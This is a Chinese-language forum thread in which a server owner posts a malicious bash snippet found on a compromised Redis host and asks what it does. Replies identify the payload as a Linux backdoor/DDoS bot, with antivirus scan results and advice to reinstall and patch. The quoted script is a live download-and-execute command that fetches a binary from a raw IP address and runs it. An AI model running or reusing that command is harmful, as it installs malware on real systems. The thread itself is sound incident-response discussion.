linux - 這段黑客程式碼什麼意思?
ringa_lee
ringa_lee 2017-06-07 09:24:08
0
2
928

今天發現一台伺服器redis無法連接,在伺服器發現這樣一條指令

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

下載並執行了z.TF文件,z.TF開啟都是字節碼,此程式可以自動重新執行。

目前將此程式進程殺死,但redis服務仍然無法使用,不知道是否還有其他惡意程式。

請高手解答z.TF的內容?並且如何處理。

ringa_lee
ringa_lee

ringa_lee

全部回覆(2)
巴扎黑

z.TF 是個ELF格式的linux執行檔

你伺服器被裝了後門,盡快重裝系統,修復漏洞。
該升級的都升級一遍。


基本上可以確定是 後門+肉雞

VirSCAN.org Scanned Report :
Scanned time   : 2017-06-06 20:53:39
Scanner results: 10%的杀软(4/39)报告发现病毒
File Name      : z.TF
File Size      : 649640 byte
File Type      : application/x-executable
MD5            : a6f42e73365ad56ce42985c5518d7e34
SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
江民杀毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg            
某草草

話說你把t.ZF的程式碼寄上來啊

你貼出來的程式碼,你不是自己已經解釋清楚了麼

熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板